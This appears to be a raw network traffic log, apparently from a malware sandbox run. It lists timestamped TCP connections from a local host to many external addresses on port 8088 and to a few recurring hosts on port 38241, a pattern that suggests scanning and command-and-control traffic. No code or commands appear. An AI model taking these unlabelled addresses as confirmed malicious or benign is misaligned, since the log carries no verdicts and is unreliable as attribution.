                                                                                                Sep 12, 2024 00:38:08.843801022 CEST548848088192.168.2.23108.174.117.170
                                                                                                Sep 12, 2024 00:38:09.195400953 CEST808856610213.49.53.56192.168.2.23
                                                                                                Sep 12, 2024 00:38:09.195664883 CEST566108088192.168.2.23213.49.53.56
                                                                                                Sep 12, 2024 00:38:09.403783083 CEST808856610213.49.53.56192.168.2.23
                                                                                                Sep 12, 2024 00:38:09.403872013 CEST566108088192.168.2.23213.49.53.56
                                                                                                Sep 12, 2024 00:38:09.489111900 CEST808846942208.35.19.171192.168.2.23
                                                                                                Sep 12, 2024 00:38:09.491628885 CEST469428088192.168.2.23208.35.19.171
                                                                                                Sep 12, 2024 00:38:09.615580082 CEST808856610213.49.53.56192.168.2.23
                                                                                                Sep 12, 2024 00:38:09.615674019 CEST566108088192.168.2.23213.49.53.56
                                                                                                Sep 12, 2024 00:38:09.871592999 CEST548848088192.168.2.23108.174.117.170
                                                                                                Sep 12, 2024 00:38:10.056966066 CEST3824144164154.216.17.220192.168.2.23
                                                                                                Sep 12, 2024 00:38:10.057073116 CEST808856610213.49.53.56192.168.2.23
                                                                                                Sep 12, 2024 00:38:10.057128906 CEST566108088192.168.2.23213.49.53.56
                                                                                                Sep 12, 2024 00:38:10.058828115 CEST4416438241192.168.2.23154.216.17.220
                                                                                                Sep 12, 2024 00:38:10.232120991 CEST3824144164154.216.17.220192.168.2.23
                                                                                                Sep 12, 2024 00:38:10.234215975 CEST4416438241192.168.2.23154.216.17.220
                                                                                                Sep 12, 2024 00:38:10.273572922 CEST4416438241192.168.2.23154.216.17.220
                                                                                                Sep 12, 2024 00:38:10.439625025 CEST3824144164154.216.17.220192.168.2.23
                                                                                                Sep 12, 2024 00:38:10.441519976 CEST4416438241192.168.2.23154.216.17.220
                                                                                                Sep 12, 2024 00:38:10.493221045 CEST4416438241192.168.2.23154.216.17.220
                                                                                                Sep 12, 2024 00:38:10.571475029 CEST469428088192.168.2.23208.35.19.171
                                                                                                Sep 12, 2024 00:38:10.871778965 CEST3824144164154.216.17.220192.168.2.23
                                                                                                Sep 12, 2024 00:38:10.873512983 CEST4416438241192.168.2.23154.216.17.220
                                                                                                Sep 12, 2024 00:38:10.929258108 CEST4416438241192.168.2.23154.216.17.220
                                                                                                Sep 12, 2024 00:38:11.058862925 CEST5951038241192.168.2.2391.92.246.113
                                                                                                Sep 12, 2024 00:38:11.793098927 CEST4416438241192.168.2.23154.216.17.220
                                                                                                Sep 12, 2024 00:38:11.846641064 CEST449328088192.168.2.23207.65.222.48
                                                                                                Sep 12, 2024 00:38:11.867036104 CEST382415951091.92.246.113192.168.2.23
                                                                                                Sep 12, 2024 00:38:11.867098093 CEST5951038241192.168.2.2391.92.246.113
                                                                                                Sep 12, 2024 00:38:12.249247074 CEST80884265891.185.226.47192.168.2.23
                                                                                                Sep 12, 2024 00:38:12.251271009 CEST426588088192.168.2.2391.185.226.47
                                                                                                Sep 12, 2024 00:38:12.459827900 CEST80884265891.185.226.47192.168.2.23
                                                                                                Sep 12, 2024 00:38:12.459884882 CEST426588088192.168.2.2391.185.226.47
                                                                                                Sep 12, 2024 00:38:12.671756029 CEST80884265891.185.226.47192.168.2.23
                                                                                                Sep 12, 2024 00:38:12.671829939 CEST426588088192.168.2.2391.185.226.47
                                                                                                Sep 12, 2024 00:38:12.879183054 CEST449328088192.168.2.23207.65.222.48
                                                                                                Sep 12, 2024 00:38:12.891798973 CEST382415951091.92.246.113192.168.2.23
                                                                                                Sep 12, 2024 00:38:12.891858101 CEST5951038241192.168.2.2391.92.246.113
                                                                                                Sep 12, 2024 00:38:13.035145044 CEST469428088192.168.2.23208.35.19.171
                                                                                                Sep 12, 2024 00:38:13.061188936 CEST5951038241192.168.2.2391.92.246.113
                                                                                                Sep 12, 2024 00:38:13.520728111 CEST4416438241192.168.2.23154.216.17.220
                                                                                                Sep 12, 2024 00:38:13.656351089 CEST808846942208.35.19.171192.168.2.23
                                                                                                Sep 12, 2024 00:38:13.656431913 CEST469428088192.168.2.23208.35.19.171
                                                                                                Sep 12, 2024 00:38:13.827375889 CEST808846942208.35.19.171192.168.2.23
                                                                                                Sep 12, 2024 00:38:14.848100901 CEST352228088192.168.2.23118.143.223.55
                                                                                                Sep 12, 2024 00:38:14.890904903 CEST5951038241192.168.2.2391.92.246.113
                                                                                                Sep 12, 2024 00:38:15.185906887 CEST382415951091.92.246.113192.168.2.23
                                                                                                Sep 12, 2024 00:38:15.185983896 CEST5951038241192.168.2.2391.92.246.113
                                                                                                Sep 12, 2024 00:38:15.211370945 CEST808837442187.125.238.133192.168.2.23
                                                                                                Sep 12, 2024 00:38:15.214858055 CEST374428088192.168.2.23187.125.238.133
                                                                                                Sep 12, 2024 00:38:15.419665098 CEST808837442187.125.238.133192.168.2.23
                                                                                                Sep 12, 2024 00:38:15.419748068 CEST374428088192.168.2.23187.125.238.133
                                                                                                Sep 12, 2024 00:38:15.632036924 CEST808837442187.125.238.133192.168.2.23
                                                                                                Sep 12, 2024 00:38:15.632114887 CEST374428088192.168.2.23187.125.238.133
                                                                                                Sep 12, 2024 00:38:15.850775003 CEST352228088192.168.2.23118.143.223.55
                                                                                                Sep 12, 2024 00:38:16.055846930 CEST808837442187.125.238.133192.168.2.23
                                                                                                Sep 12, 2024 00:38:16.055917025 CEST374428088192.168.2.23187.125.238.133
                                                                                                Sep 12, 2024 00:38:16.478626966 CEST808835222118.143.223.55192.168.2.23
                                                                                                Sep 12, 2024 00:38:16.478910923 CEST352228088192.168.2.23118.143.223.55
                                                                                                Sep 12, 2024 00:38:17.135844946 CEST4416438241192.168.2.23154.216.17.220
                                                                                                Sep 12, 2024 00:38:17.386557102 CEST5951038241192.168.2.2391.92.246.113
                                                                                                Sep 12, 2024 00:38:17.495975971 CEST808835222118.143.223.55192.168.2.23
                                                                                                Sep 12, 2024 00:38:17.496023893 CEST352228088192.168.2.23118.143.223.55
                                                                                                Sep 12, 2024 00:38:17.849370956 CEST352228088192.168.2.23118.143.223.55
                                                                                                Sep 12, 2024 00:38:17.849878073 CEST590168088192.168.2.23115.202.13.183
                                                                                                Sep 12, 2024 00:38:17.943190098 CEST382415951091.92.246.113192.168.2.23
                                                                                                Sep 12, 2024 00:38:17.944340944 CEST382415951091.92.246.113192.168.2.23
                                                                                                Sep 12, 2024 00:38:18.197210073 CEST80885263433.247.222.246192.168.2.23
                                                                                                Sep 12, 2024 00:38:18.198436975 CEST526348088192.168.2.2333.247.222.246
                                                                                                Sep 12, 2024 00:38:18.414114952 CEST80885263433.247.222.246192.168.2.23
                                                                                                Sep 12, 2024 00:38:18.414177895 CEST526348088192.168.2.2333.247.222.246
                                                                                                Sep 12, 2024 00:38:18.627873898 CEST80885263433.247.222.246192.168.2.23
                                                                                                Sep 12, 2024 00:38:18.627937078 CEST526348088192.168.2.2333.247.222.246
                                                                                                Sep 12, 2024 00:38:18.858362913 CEST590168088192.168.2.23115.202.13.183
                                                                                                Sep 12, 2024 00:38:18.947438955 CEST5396438241192.168.2.2393.123.85.166
                                                                                                Sep 12, 2024 00:38:19.306299925 CEST352228088192.168.2.23118.143.223.55
                                                                                                Sep 12, 2024 00:38:19.511781931 CEST808835222118.143.223.55192.168.2.23
                                                                                                Sep 12, 2024 00:38:19.511841059 CEST352228088192.168.2.23118.143.223.55
                                                                                                Sep 12, 2024 00:38:19.588905096 CEST382415396493.123.85.166192.168.2.23
                                                                                                Sep 12, 2024 00:38:19.589010954 CEST5396438241192.168.2.2393.123.85.166
                                                                                                Sep 12, 2024 00:38:20.214508057 CEST382415396493.123.85.166192.168.2.23
                                                                                                Sep 12, 2024 00:38:20.218240023 CEST5396438241192.168.2.2393.123.85.166
                                                                                                Sep 12, 2024 00:38:20.851563931 CEST335168088192.168.2.23157.173.158.186
                                                                                                Sep 12, 2024 00:38:20.949419975 CEST5396438241192.168.2.2393.123.85.166
                                                                                                Sep 12, 2024 00:38:20.949449062 CEST5396438241192.168.2.2393.123.85.166
                                                                                                Sep 12, 2024 00:38:21.194071054 CEST352228088192.168.2.23118.143.223.55
                                                                                                Sep 12, 2024 00:38:21.209635973 CEST808858836182.203.244.103192.168.2.23
                                                                                                Sep 12, 2024 00:38:21.210050106 CEST588368088192.168.2.23182.203.244.103
                                                                                                Sep 12, 2024 00:38:21.423736095 CEST808858836182.203.244.103192.168.2.23
                                                                                                Sep 12, 2024 00:38:21.423818111 CEST588368088192.168.2.23182.203.244.103
                                                                                                Sep 12, 2024 00:38:21.635911942 CEST808858836182.203.244.103192.168.2.23
                                                                                                Sep 12, 2024 00:38:21.635993958 CEST588368088192.168.2.23182.203.244.103
                                                                                                Sep 12, 2024 00:38:21.687841892 CEST382415396493.123.85.166192.168.2.23
                                                                                                Sep 12, 2024 00:38:21.687928915 CEST5396438241192.168.2.2393.123.85.166
                                                                                                Sep 12, 2024 00:38:21.774147034 CEST808835222118.143.223.55192.168.2.23
                                                                                                Sep 12, 2024 00:38:21.775791883 CEST808835222118.143.223.55192.168.2.23
                                                                                                Sep 12, 2024 00:38:21.865981102 CEST335168088192.168.2.23157.173.158.186
                                                                                                Sep 12, 2024 00:38:21.950859070 CEST3384438241192.168.2.2345.202.35.64
                                                                                                Sep 12, 2024 00:38:22.075841904 CEST808858836182.203.244.103192.168.2.23
                                                                                                Sep 12, 2024 00:38:22.075932026 CEST588368088192.168.2.23182.203.244.103
                                                                                                Sep 12, 2024 00:38:22.249923944 CEST5396438241192.168.2.2393.123.85.166
                                                                                                Sep 12, 2024 00:38:22.455951929 CEST808833516157.173.158.186192.168.2.23
                                                                                                Sep 12, 2024 00:38:22.456056118 CEST335168088192.168.2.23157.173.158.186
                                                                                                Sep 12, 2024 00:38:22.857026100 CEST382415396493.123.85.166192.168.2.23
                                                                                                Sep 12, 2024 00:38:22.935945988 CEST808858836182.203.244.103192.168.2.23
                                                                                                Sep 12, 2024 00:38:22.936007023 CEST588368088192.168.2.23182.203.244.103
                                                                                                Sep 12, 2024 00:38:22.957830906 CEST3384438241192.168.2.2345.202.35.64
                                                                                                Sep 12, 2024 00:38:23.058696985 CEST808833516157.173.158.186192.168.2.23
                                                                                                Sep 12, 2024 00:38:23.061897993 CEST335168088192.168.2.23157.173.158.186
                                                                                                Sep 12, 2024 00:38:23.852659941 CEST335168088192.168.2.23157.173.158.186
                                                                                                Sep 12, 2024 00:38:23.853121996 CEST496828088192.168.2.2356.83.140.120
                                                                                                Sep 12, 2024 00:38:24.043658972 CEST4416438241192.168.2.23154.216.17.220
                                                                                                Sep 12, 2024 00:38:24.473424911 CEST808833516157.173.158.186192.168.2.23
                                                                                                Sep 12, 2024 00:38:24.477518082 CEST335168088192.168.2.23157.173.158.186
                                                                                                Sep 12, 2024 00:38:24.631808996 CEST808858836182.203.244.103192.168.2.23
                                                                                                Sep 12, 2024 00:38:24.631889105 CEST588368088192.168.2.23182.203.244.103
                                                                                                Sep 12, 2024 00:38:24.668962955 CEST3824144164154.216.17.220192.168.2.23
                                                                                                Sep 12, 2024 00:38:24.873573065 CEST496828088192.168.2.2356.83.140.120
                                                                                                Sep 12, 2024 00:38:24.970566034 CEST3384438241192.168.2.2345.202.35.64
                                                                                                Sep 12, 2024 00:38:25.257540941 CEST335168088192.168.2.23157.173.158.186
                                                                                                Sep 12, 2024 00:38:26.295960903 CEST808833516157.173.158.186192.168.2.23
                                                                                                Sep 12, 2024 00:38:26.296020031 CEST335168088192.168.2.23157.173.158.186
                                                                                                Sep 12, 2024 00:38:26.855597019 CEST581048088192.168.2.2396.199.227.179
                                                                                                Sep 12, 2024 00:38:27.049277067 CEST335168088192.168.2.23157.173.158.186
                                                                                                Sep 12, 2024 00:38:27.656934023 CEST808833516157.173.158.186192.168.2.23
                                                                                                Sep 12, 2024 00:38:27.881179094 CEST581048088192.168.2.2396.199.227.179
                                                                                                Sep 12, 2024 00:38:27.991900921 CEST808858836182.203.244.103192.168.2.23
                                                                                                Sep 12, 2024 00:38:27.991991997 CEST588368088192.168.2.23182.203.244.103
                                                                                                Sep 12, 2024 00:38:29.160996914 CEST3384438241192.168.2.2345.202.35.64
                                                                                                Sep 12, 2024 00:38:29.745376110 CEST382413384445.202.35.64192.168.2.23
                                                                                                Sep 12, 2024 00:38:29.745714903 CEST3384438241192.168.2.2345.202.35.64
                                                                                                Sep 12, 2024 00:38:29.746489048 CEST3384438241192.168.2.2345.202.35.64
                                                                                                Sep 12, 2024 00:38:29.860606909 CEST529148088192.168.2.2361.221.100.106
                                                                                                Sep 12, 2024 00:38:30.265223026 CEST80885291461.221.100.106192.168.2.23
                                                                                                Sep 12, 2024 00:38:30.265321016 CEST529148088192.168.2.2361.221.100.106
                                                                                                Sep 12, 2024 00:38:30.434174061 CEST80885291461.221.100.106192.168.2.23
                                                                                                Sep 12, 2024 00:38:30.436826944 CEST529148088192.168.2.2361.221.100.106
                                                                                                Sep 12, 2024 00:38:30.775721073 CEST382413384445.202.35.64192.168.2.23
                                                                                                Sep 12, 2024 00:38:30.775799036 CEST3384438241192.168.2.2345.202.35.64
                                                                                                Sep 12, 2024 00:38:30.971875906 CEST80885291461.221.100.106192.168.2.23
                                                                                                Sep 12, 2024 00:38:30.971923113 CEST529148088192.168.2.2361.221.100.106
                                                                                                Sep 12, 2024 00:38:31.144737005 CEST3384438241192.168.2.2345.202.35.64
                                                                                                Sep 12, 2024 00:38:32.791860104 CEST382413384445.202.35.64192.168.2.23
                                                                                                Sep 12, 2024 00:38:32.791914940 CEST3384438241192.168.2.2345.202.35.64
                                                                                                Sep 12, 2024 00:38:32.861535072 CEST529148088192.168.2.2361.221.100.106
                                                                                                Sep 12, 2024 00:38:32.861994028 CEST559828088192.168.2.23169.103.217.37
                                                                                                Sep 12, 2024 00:38:32.904483080 CEST3384438241192.168.2.2345.202.35.64
                                                                                                Sep 12, 2024 00:38:32.916766882 CEST382413384445.202.35.64192.168.2.23
                                                                                                Sep 12, 2024 00:38:32.916920900 CEST3384438241192.168.2.2345.202.35.64
                                                                                                Sep 12, 2024 00:38:33.028803110 CEST382413384445.202.35.64192.168.2.23
                                                                                                Sep 12, 2024 00:38:33.034712076 CEST382413384445.202.35.64192.168.2.23
                                                                                                Sep 12, 2024 00:38:33.864375114 CEST559828088192.168.2.23169.103.217.37
                                                                                                Sep 12, 2024 00:38:33.896344900 CEST529148088192.168.2.2361.221.100.106
                                                                                                Sep 12, 2024 00:38:33.917973042 CEST4420238241192.168.2.23154.216.17.220
                                                                                                Sep 12, 2024 00:38:34.050389051 CEST3824144202154.216.17.220192.168.2.23
                                                                                                Sep 12, 2024 00:38:34.050473928 CEST4420238241192.168.2.23154.216.17.220
                                                                                                Sep 12, 2024 00:38:34.908163071 CEST808858836182.203.244.103192.168.2.23
                                                                                                Sep 12, 2024 00:38:34.908230066 CEST588368088192.168.2.23182.203.244.103
                                                                                                Sep 12, 2024 00:38:35.064193964 CEST3824144202154.216.17.220192.168.2.23
                                                                                                Sep 12, 2024 00:38:35.064270973 CEST4420238241192.168.2.23154.216.17.220
                                                                                                Sep 12, 2024 00:38:35.144198895 CEST529148088192.168.2.2361.221.100.106
                                                                                                Sep 12, 2024 00:38:35.863739014 CEST606128088192.168.2.23185.229.214.63
                                                                                                Sep 12, 2024 00:38:35.919635057 CEST4420238241192.168.2.23154.216.17.220
                                                                                                Sep 12, 2024 00:38:36.328012943 CEST4420238241192.168.2.23154.216.17.220
                                                                                                Sep 12, 2024 00:38:36.743998051 CEST4420238241192.168.2.23154.216.17.220
                                                                                                Sep 12, 2024 00:38:36.871984959 CEST606128088192.168.2.23185.229.214.63
                                                                                                Sep 12, 2024 00:38:37.079782963 CEST3824144202154.216.17.220192.168.2.23
                                                                                                Sep 12, 2024 00:38:37.079888105 CEST4420238241192.168.2.23154.216.17.220
                                                                                                Sep 12, 2024 00:38:37.270539045 CEST3824144202154.216.17.220192.168.2.23
                                                                                                Sep 12, 2024 00:38:37.270684958 CEST4420238241192.168.2.23154.216.17.220
                                                                                                Sep 12, 2024 00:38:37.575884104 CEST4420238241192.168.2.23154.216.17.220
                                                                                                Sep 12, 2024 00:38:37.607888937 CEST529148088192.168.2.2361.221.100.106
                                                                                                Sep 12, 2024 00:38:38.272089958 CEST5953638241192.168.2.2391.92.246.113
                                                                                                Sep 12, 2024 00:38:38.867949963 CEST552288088192.168.2.23184.87.98.222
                                                                                                Sep 12, 2024 00:38:39.000375032 CEST808855228184.87.98.222192.168.2.23
                                                                                                Sep 12, 2024 00:38:39.000626087 CEST552288088192.168.2.23184.87.98.222
                                                                                                Sep 12, 2024 00:38:39.207688093 CEST4420238241192.168.2.23154.216.17.220
                                                                                                Sep 12, 2024 00:38:39.303651094 CEST5953638241192.168.2.2391.92.246.113
                                                                                                Sep 12, 2024 00:38:40.023802042 CEST808855228184.87.98.222192.168.2.23
                                                                                                Sep 12, 2024 00:38:40.023880959 CEST552288088192.168.2.23184.87.98.222
                                                                                                Sep 12, 2024 00:38:41.323410034 CEST5953638241192.168.2.2391.92.246.113
                                                                                                Sep 12, 2024 00:38:41.869534969 CEST552288088192.168.2.23184.87.98.222
                                                                                                Sep 12, 2024 00:38:41.869976044 CEST448868088192.168.2.23242.135.104.48
                                                                                                Sep 12, 2024 00:38:42.039741039 CEST808855228184.87.98.222192.168.2.23
                                                                                                Sep 12, 2024 00:38:42.039825916 CEST552288088192.168.2.23184.87.98.222
                                                                                                Sep 12, 2024 00:38:42.279247999 CEST552288088192.168.2.23184.87.98.222
                                                                                                Sep 12, 2024 00:38:42.443099976 CEST808855228184.87.98.222192.168.2.23
                                                                                                Sep 12, 2024 00:38:42.444461107 CEST808855228184.87.98.222192.168.2.23
                                                                                                Sep 12, 2024 00:38:42.471187115 CEST4420238241192.168.2.23154.216.17.220
                                                                                                Sep 12, 2024 00:38:42.727181911 CEST529148088192.168.2.2361.221.100.106
                                                                                                Sep 12, 2024 00:38:42.876110077 CEST80885291461.221.100.106192.168.2.23
                                                                                                Sep 12, 2024 00:38:42.891143084 CEST448868088192.168.2.23242.135.104.48
                                                                                                Sep 12, 2024 00:38:44.119781017 CEST3824144202154.216.17.220192.168.2.23
                                                                                                Sep 12, 2024 00:38:44.119877100 CEST4420238241192.168.2.23154.216.17.220
                                                                                                Sep 12, 2024 00:38:44.872109890 CEST384948088192.168.2.23107.87.27.184
                                                                                                Sep 12, 2024 00:38:45.542850018 CEST5953638241192.168.2.2391.92.246.113
                                                                                                Sep 12, 2024 00:38:45.894797087 CEST384948088192.168.2.23107.87.27.184
                                                                                                Sep 12, 2024 00:38:47.873537064 CEST540408088192.168.2.2381.209.218.53
                                                                                                Sep 12, 2024 00:38:48.047604084 CEST80885404081.209.218.53192.168.2.23
                                                                                                Sep 12, 2024 00:38:48.047674894 CEST540408088192.168.2.2381.209.218.53
                                                                                                Sep 12, 2024 00:38:48.612437010 CEST808858836182.203.244.103192.168.2.23
                                                                                                Sep 12, 2024 00:38:48.612514973 CEST588368088192.168.2.23182.203.244.103
                                                                                                Sep 12, 2024 00:38:49.047955036 CEST80885404081.209.218.53192.168.2.23
                                                                                                Sep 12, 2024 00:38:49.048037052 CEST540408088192.168.2.2381.209.218.53
                                                                                                Sep 12, 2024 00:38:49.126348972 CEST4420238241192.168.2.23154.216.17.220
                                                                                                Sep 12, 2024 00:38:50.875025988 CEST540408088192.168.2.2381.209.218.53
                                                                                                Sep 12, 2024 00:38:50.878127098 CEST521468088192.168.2.23197.159.201.249
                                                                                                Sep 12, 2024 00:38:50.977255106 CEST80885404081.209.218.53192.168.2.23
                                                                                                Sep 12, 2024 00:38:50.978748083 CEST80885404081.209.218.53192.168.2.23
                                                                                                Sep 12, 2024 00:38:50.980150938 CEST808852146197.159.201.249192.168.2.23
                                                                                                Sep 12, 2024 00:38:51.282640934 CEST5399438241192.168.2.2393.123.85.166
                                                                                                Sep 12, 2024 00:38:51.407382011 CEST382415399493.123.85.166192.168.2.23
                                                                                                Sep 12, 2024 00:38:51.407485008 CEST5399438241192.168.2.2393.123.85.166
                                                                                                Sep 12, 2024 00:38:51.995826006 CEST808852146197.159.201.249192.168.2.23
                                                                                                Sep 12, 2024 00:38:51.997898102 CEST521468088192.168.2.23197.159.201.249
                                                                                                Sep 12, 2024 00:38:52.117451906 CEST808852146197.159.201.249192.168.2.23
                                                                                                Sep 12, 2024 00:38:52.123327017 CEST521468088192.168.2.23197.159.201.249
                                                                                                Sep 12, 2024 00:38:52.407913923 CEST382415399493.123.85.166192.168.2.23
                                                                                                Sep 12, 2024 00:38:52.408004999 CEST5399438241192.168.2.2393.123.85.166
                                                                                                Sep 12, 2024 00:38:52.494577885 CEST382415399493.123.85.166192.168.2.23
                                                                                                Sep 12, 2024 00:38:52.501876116 CEST5399438241192.168.2.2393.123.85.166
                                                                                                Sep 12, 2024 00:38:53.284960032 CEST5399438241192.168.2.2393.123.85.166
                                                                                                Sep 12, 2024 00:38:53.285018921 CEST5399438241192.168.2.2393.123.85.166
                                                                                                Sep 12, 2024 00:38:53.573807001 CEST5399438241192.168.2.2393.123.85.166
                                                                                                Sep 12, 2024 00:38:53.848824978 CEST3824144202154.216.17.220192.168.2.23
                                                                                                Sep 12, 2024 00:38:53.848892927 CEST4420238241192.168.2.23154.216.17.220
                                                                                                Sep 12, 2024 00:38:53.877125978 CEST579688088192.168.2.2325.192.234.141
                                                                                                Sep 12, 2024 00:38:53.878185034 CEST521468088192.168.2.23197.159.201.249
                                                                                                Sep 12, 2024 00:38:53.957709074 CEST5399438241192.168.2.2393.123.85.166
                                                                                                Sep 12, 2024 00:38:54.214703083 CEST521468088192.168.2.23197.159.201.249
                                                                                                Sep 12, 2024 00:38:54.286451101 CEST3387438241192.168.2.2345.202.35.64
                                                                                                Sep 12, 2024 00:38:54.539369106 CEST521468088192.168.2.23197.159.201.249
                                                                                                Sep 12, 2024 00:38:54.616158009 CEST808852146197.159.201.249192.168.2.23
                                                                                                Sep 12, 2024 00:38:54.618160009 CEST521468088192.168.2.23197.159.201.249
                                                                                                Sep 12, 2024 00:38:54.660783052 CEST808852146197.159.201.249192.168.2.23
                                                                                                Sep 12, 2024 00:38:54.729588985 CEST5399438241192.168.2.2393.123.85.166
                                                                                                Sep 12, 2024 00:38:54.821569920 CEST808852146197.159.201.249192.168.2.23
                                                                                                Sep 12, 2024 00:38:54.871937037 CEST382415399493.123.85.166192.168.2.23
                                                                                                Sep 12, 2024 00:38:54.872014046 CEST5399438241192.168.2.2393.123.85.166
                                                                                                Sep 12, 2024 00:38:54.885580063 CEST579688088192.168.2.2325.192.234.141
                                                                                                Sep 12, 2024 00:38:55.301490068 CEST3387438241192.168.2.2345.202.35.64
                                                                                                Sep 12, 2024 00:38:56.261393070 CEST5399438241192.168.2.2393.123.85.166
                                                                                                Sep 12, 2024 00:38:56.879751921 CEST433928088192.168.2.23192.126.40.239
                                                                                                Sep 12, 2024 00:38:57.112934113 CEST808843392192.126.40.239192.168.2.23
                                                                                                Sep 12, 2024 00:38:57.113101006 CEST433928088192.168.2.23192.126.40.239
                                                                                                Sep 12, 2024 00:38:57.317214966 CEST3387438241192.168.2.2345.202.35.64
                                                                                                Sep 12, 2024 00:38:58.136009932 CEST808843392192.126.40.239192.168.2.23
                                                                                                Sep 12, 2024 00:38:58.136110067 CEST433928088192.168.2.23192.126.40.239
                                                                                                Sep 12, 2024 00:38:58.199827909 CEST382415399493.123.85.166192.168.2.23
                                                                                                Sep 12, 2024 00:38:58.199913979 CEST5399438241192.168.2.2393.123.85.166
                                                                                                Sep 12, 2024 00:38:59.364953995 CEST5399438241192.168.2.2393.123.85.166
                                                                                                Sep 12, 2024 00:38:59.442747116 CEST382415399493.123.85.166192.168.2.23
                                                                                                Sep 12, 2024 00:38:59.881345987 CEST433928088192.168.2.23192.126.40.239
                                                                                                Sep 12, 2024 00:38:59.881658077 CEST523288088192.168.2.2345.106.155.12
                                                                                                Sep 12, 2024 00:39:00.151938915 CEST808843392192.126.40.239192.168.2.23
                                                                                                Sep 12, 2024 00:39:00.151988983 CEST433928088192.168.2.23192.126.40.239
                                                                                                Sep 12, 2024 00:39:00.265811920 CEST808843392192.126.40.239192.168.2.23
                                                                                                Sep 12, 2024 00:39:00.272793055 CEST433928088192.168.2.23192.126.40.239
                                                                                                Sep 12, 2024 00:39:00.580811024 CEST433928088192.168.2.23192.126.40.239
                                                                                                Sep 12, 2024 00:39:00.900743961 CEST523288088192.168.2.2345.106.155.12
                                                                                                Sep 12, 2024 00:39:01.284791946 CEST433928088192.168.2.23192.126.40.239
                                                                                                Sep 12, 2024 00:39:01.395034075 CEST808843392192.126.40.239192.168.2.23
                                                                                                Sep 12, 2024 00:39:01.412652969 CEST3387438241192.168.2.2345.202.35.64
                                                                                                Sep 12, 2024 00:39:02.180582047 CEST4420238241192.168.2.23154.216.17.220
                                                                                                Sep 12, 2024 00:39:02.882910013 CEST514448088192.168.2.23204.235.25.185
                                                                                                Sep 12, 2024 00:39:03.908407927 CEST514448088192.168.2.23204.235.25.185
                                                                                                Sep 12, 2024 00:39:03.987236977 CEST808851444204.235.25.185192.168.2.23
                                                                                                Sep 12, 2024 00:39:03.987339020 CEST514448088192.168.2.23204.235.25.185
                                                                                                Sep 12, 2024 00:39:05.020101070 CEST808851444204.235.25.185192.168.2.23
                                                                                                Sep 12, 2024 00:39:05.020179033 CEST514448088192.168.2.23204.235.25.185
                                                                                                Sep 12, 2024 00:39:05.884020090 CEST514448088192.168.2.23204.235.25.185
                                                                                                Sep 12, 2024 00:39:05.884608030 CEST417468088192.168.2.23254.30.40.98
                                                                                                Sep 12, 2024 00:39:05.951531887 CEST808841746254.30.40.98192.168.2.23
                                                                                                Sep 12, 2024 00:39:05.951658964 CEST417468088192.168.2.23254.30.40.98
                                                                                                Sep 12, 2024 00:39:06.012777090 CEST808841746254.30.40.98192.168.2.23
                                                                                                Sep 12, 2024 00:39:06.016196966 CEST417468088192.168.2.23254.30.40.98
                                                                                                Sep 12, 2024 00:39:06.180124044 CEST514448088192.168.2.23204.235.25.185
                                                                                                Sep 12, 2024 00:39:06.467984915 CEST514448088192.168.2.23204.235.25.185
                                                                                                Sep 12, 2024 00:39:07.035933971 CEST808851444204.235.25.185192.168.2.23
                                                                                                Sep 12, 2024 00:39:07.035985947 CEST514448088192.168.2.23204.235.25.185
                                                                                                Sep 12, 2024 00:39:07.043893099 CEST514448088192.168.2.23204.235.25.185
                                                                                                Sep 12, 2024 00:39:07.297851086 CEST4423238241192.168.2.23154.216.17.220
                                                                                                Sep 12, 2024 00:39:08.195836067 CEST514448088192.168.2.23204.235.25.185
                                                                                                Sep 12, 2024 00:39:08.323760033 CEST4423238241192.168.2.23154.216.17.220
                                                                                                Sep 12, 2024 00:39:08.886118889 CEST417468088192.168.2.23254.30.40.98
                                                                                                Sep 12, 2024 00:39:08.887011051 CEST479908088192.168.2.235.178.90.206
                                                                                                Sep 12, 2024 00:39:09.155649900 CEST417468088192.168.2.23254.30.40.98
                                                                                                Sep 12, 2024 00:39:09.443618059 CEST417468088192.168.2.23254.30.40.98
                                                                                                Sep 12, 2024 00:39:09.891578913 CEST479908088192.168.2.235.178.90.206
                                                                                                Sep 12, 2024 00:39:09.987520933 CEST417468088192.168.2.23254.30.40.98
                                                                                                Sep 12, 2024 00:39:10.339509010 CEST4423238241192.168.2.23154.216.17.220
                                                                                                Sep 12, 2024 00:39:10.394946098 CEST3824144232154.216.17.220192.168.2.23
                                                                                                Sep 12, 2024 00:39:10.395021915 CEST4423238241192.168.2.23154.216.17.220
                                                                                                Sep 12, 2024 00:39:10.396066904 CEST4423238241192.168.2.23154.216.17.220
                                                                                                Sep 12, 2024 00:39:10.627443075 CEST514448088192.168.2.23204.235.25.185
                                                                                                Sep 12, 2024 00:39:10.659427881 CEST4423238241192.168.2.23154.216.17.220
                                                                                                Sep 12, 2024 00:39:10.947407961 CEST4423238241192.168.2.23154.216.17.220
                                                                                                Sep 12, 2024 00:39:11.075409889 CEST417468088192.168.2.23254.30.40.98
                                                                                                Sep 12, 2024 00:39:11.259895086 CEST808851444204.235.25.185192.168.2.23
                                                                                                Sep 12, 2024 00:39:11.259991884 CEST514448088192.168.2.23204.235.25.185
                                                                                                Sep 12, 2024 00:39:11.420070887 CEST3824144232154.216.17.220192.168.2.23
                                                                                                Sep 12, 2024 00:39:11.420125008 CEST4423238241192.168.2.23154.216.17.220
                                                                                                Sep 12, 2024 00:39:11.491353989 CEST4423238241192.168.2.23154.216.17.220
                                                                                                Sep 12, 2024 00:39:11.534914017 CEST3824144232154.216.17.220192.168.2.23
                                                                                                Sep 12, 2024 00:39:11.536072016 CEST3824144232154.216.17.220192.168.2.23
                                                                                                Sep 12, 2024 00:39:11.890280962 CEST355588088192.168.2.23142.172.118.111
                                                                                                Sep 12, 2024 00:39:11.935049057 CEST808835558142.172.118.111192.168.2.23
                                                                                                Sep 12, 2024 00:39:11.935208082 CEST355588088192.168.2.23142.172.118.111
                                                                                                Sep 12, 2024 00:39:12.538141012 CEST5956838241192.168.2.2391.92.246.113
                                                                                                Sep 12, 2024 00:39:12.952142954 CEST808835558142.172.118.111192.168.2.23
                                                                                                Sep 12, 2024 00:39:12.952251911 CEST355588088192.168.2.23142.172.118.111
                                                                                                Sep 12, 2024 00:39:12.994503021 CEST808835558142.172.118.111192.168.2.23
                                                                                                Sep 12, 2024 00:39:12.995120049 CEST355588088192.168.2.23142.172.118.111
                                                                                                Sep 12, 2024 00:39:13.443080902 CEST417468088192.168.2.23254.30.40.98
                                                                                                Sep 12, 2024 00:39:13.539089918 CEST5956838241192.168.2.2391.92.246.113
                                                                                                Sep 12, 2024 00:39:14.891853094 CEST355588088192.168.2.23142.172.118.111
                                                                                                Sep 12, 2024 00:39:14.892438889 CEST543948088192.168.2.23112.144.139.77
